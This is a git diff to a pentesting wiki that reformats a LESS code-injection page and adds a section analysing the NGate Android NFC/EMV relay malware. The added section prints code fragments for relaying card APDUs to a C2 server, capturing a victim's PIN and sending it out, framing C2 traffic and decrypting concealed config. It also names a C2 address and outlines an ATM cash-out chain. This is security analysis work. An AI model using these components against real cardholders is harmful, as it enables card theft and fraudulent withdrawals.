diff --git a/src/pentesting-web/xs-search/css-injection/less-code-injection.md b/src/pentesting-web/xs-search/css-injection/less-code-injection.md
index b9d599deb30..6d338df2b68 100644
--- a/src/pentesting-web/xs-search/css-injection/less-code-injection.md
+++ b/src/pentesting-web/xs-search/css-injection/less-code-injection.md
@@ -1,4 +1,6 @@
-## LESS Code Injection leading to SSRF & Local File Read
+# LESS Code Injection leading to SSRF & Local File Read
+
+{{#include ../../../banners/hacktricks-training.md}}
LESS is a popular CSS pre-processor that adds variables, mixins, functions and the powerful `@import` directive. During compilation the LESS engine will **fetch the resources referenced in `@import`** statements and embed ("inline") their contents into the resulting CSS when the `(inline)` option is used.
@@ -59,4 +61,5 @@ curl -sk "${TARGET}rest/v10/css/preview?baseUrl=1&lm=${INJ}" | \
* [SugarCRM ≤ 14.0.0 (css/preview) LESS Code Injection Vulnerability](https://karmainsecurity.com/KIS-2025-04)
* [SugarCRM Security Advisory SA-2024-059](https://support.sugarcrm.com/resources/security/sugarcrm-sa-2024-059/)
-* [CVE-2024-58258](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-58258)
\ No newline at end of file
+* [CVE-2024-58258](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-58258)
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/todo/radio-hacking/pentesting-rfid.md b/src/todo/radio-hacking/pentesting-rfid.md
index 7e9228455aa..dc8fce15543 100644
--- a/src/todo/radio-hacking/pentesting-rfid.md
+++ b/src/todo/radio-hacking/pentesting-rfid.md
@@ -156,6 +156,121 @@ If you need a **long-range**, **battery-powered** solution for harvesting HID Pr
maxiprox-mobile-cloner.md
{{#endref}}
+## NFC/EMV Relay via Android Reader↔HCE Emitter
+
+Classic EMV relay can be implemented with 2 Android devices: a victim-side reader that captures live APDUs and PIN from a real card, and an attacker-side HCE emitter at the terminal that forwards APDUs upstream. The analyzed NGate kit abuses legit Android NFC APIs and a simple framed TCP C2 to orchestrate real-time ATM cash-outs.
+
+Key building blocks
+
+- Reader-mode app (victim): uses NFC reader APIs to parse EMV (PAN/expiry/AIDs), displays scheme by AID, asks for PIN and exfiltrates immediately.
+- Emitter-mode app (ATM side): implements Host Card Emulation (HCE) with `android:requireDeviceUnlock="false"` and a payment AID; `processCommandApdu()` forwards APDUs to C2 and returns minimal response.
+- Wire protocol: length-prefixed frames, periodic keepalive; optionally TLS.
+
+Android surface (Manifest/HCE)
+
+```xml
+
+
+
+
+
+
+
+
+
+```
+
+hce.xml example (no unlock + payment AID)
+
+```xml
+
+
+
+
+
+
+
+
+```
+
+Transparent relay endpoint (HCE)
+
+```java
+@Override public byte[] processCommandApdu(byte[] apdu, Bundle extras) {
+ Log.d("ApduService", "APDU-IN: " + toHex(apdu));
+ bus.forward(apdu); // send upstream to C2/reader
+ return new byte[0]; // empty response, pure relay endpoint
+}
+```
+
+EMV scheme inference by AID (examples)
+
+- A000000004 → Mastercard
+- A000000003 → Visa
+- A000000658 → MIR
+- A000000333 → UnionPay
+
+PIN harvesting pattern (victim UI)
+
+```java
+// Custom keypad publishes when required length (e.g., 4) is reached
+if (pin.length() == 4) postDelayed(() -> bus.publish(pin), 100L);
+// Network immediately exfiltrates via dedicated opcode
+send(OP_PIN_REQ, pin.getBytes(StandardCharsets.UTF_8));
+```
+
+Framed C2 (cleartext example)
+
+- Client→Server: int32 len | int32 opcode | body
+- Server→Client: int32 len | body (opcode inside payload)
+- Reject bodies > ~100 MiB; keepalive ~7s (PING)
+
+```java
+// send
+out.writeInt(body.length); out.writeInt(op); out.write(body); out.flush();
+// recv
+int len = in.readInt(); byte[] body = new byte[len]; in.readFully(body);
+```
+
+Config concealment: cert-derived XOR
+
+- Native lib derives a 32-byte key as SHA‑256 of the app signing certificate (DER).
+- C2 config is ASCII‑hex in assets (e.g., `assets/____`), hex-decoded and XOR-ed with the key repeating every 32 bytes:
+
+```c
+for (size_t i = 0; i < len; i++) pt[i] = ct[i] ^ key[i & 31];
+```
+
+Offline PoC to decrypt config
+
+```bash
+# Extract signing cert digest
+apksigner verify --print-certs sample.apk
+# "Signer #1 certificate SHA-256 digest: "
+```
+
+```python
+import pathlib
+key = bytes.fromhex("")
+ct = bytes.fromhex(pathlib.Path("/path/to/assets/____").read_text().strip())
+pt = bytes(c ^ key[i % 32] for i, c in enumerate(ct))
+print(pt.decode("utf-8", errors="replace"))
+```
+
+Sample decrypted fields: `host`, `port`, `sharedToken`, `tls`, `mode`, `reader`, `uniqueID`, `ttd`.
+
+Relay chain (end-to-end)
+
+1) Victim installs APK, opens app → native init decrypts config from assets.
+2) App connects to C2 (e.g., `91.84.97.13:5653`) using framed TCP; keepalive ~7s.
+3) Victim taps card → reader extracts PAN/expiry/AIDs and sends CARD_DISCOVERED.
+4) Victim enters PIN → keypad publishes and exfiltrates via PIN_REQ; server replies VALID/INVALID for UI only.
+5) Attacker device at terminal runs HCE emitter relaying APDUs to the ATM and performs cash-out.
+
---
## References
@@ -165,5 +280,8 @@ maxiprox-mobile-cloner.md
- [NXP statement on MIFARE Classic Crypto1](https://www.mifare.net/en/products/chip-card-ics/mifare-classic/security-statement-on-crypto1-implementations/)
- [MIFARE security overview (Wikipedia)](https://en.wikipedia.org/wiki/MIFARE#Security)
- [NFC card vulnerability exploitation in KioSoft Stored Value (SEC Consult)](https://sec-consult.com/vulnerability-lab/advisory/nfc-card-vulnerability-exploitation-leading-to-free-top-up-kiosoft-payment-solution/)
+- [Analysis of NGate malware campaign (CERT-PL)](https://cert.pl/en/posts/2025/11/analiza-ngate/)
+- [Android apksigner – verify/print-certs](https://developer.android.com/studio/command-line/apksigner)
+- [Android Host Card Emulation (HCE) overview](https://developer.android.com/guide/topics/connectivity/nfc/hce)
-{{#include ../../banners/hacktricks-training.md}}
+{{#include ../../banners/hacktricks-training.md}}
\ No newline at end of file